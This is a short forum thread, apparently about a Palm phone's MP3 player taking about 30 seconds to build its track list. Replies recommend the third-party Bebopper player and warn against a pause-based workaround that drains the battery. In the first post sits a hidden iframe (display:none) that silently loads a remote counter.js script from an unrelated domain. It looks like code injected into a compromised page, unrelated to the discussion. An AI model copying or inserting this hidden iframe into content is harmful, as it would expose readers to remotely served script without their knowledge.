MP3 List takes a long time to load

Whenever I start the MP3 player, I have to wait about 30 seconds while the phone indicates "CREATING LIST". Anyone have a way around this? Why doesn't it just save the list and update it only when there's been a change? Every time I try to show someone the MP3 player, we have to sit around twiddling our thumbs while the list is created. <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

The only "workaround" I know is to get the much better designed Bebopper MP3 player from http://www.belltools.com

The only other workaround I know of is to pause play on the MP3 Player. However, this is NOT recommended, because while the player is paused, the Palm processor will never go to sleep. This can run down your battery rather quickly. Bebopper also has a slew of extra features over the included player, including external control of track choice, and volume levels, using the side buttons. The only thing it doesn't have is a checklist.
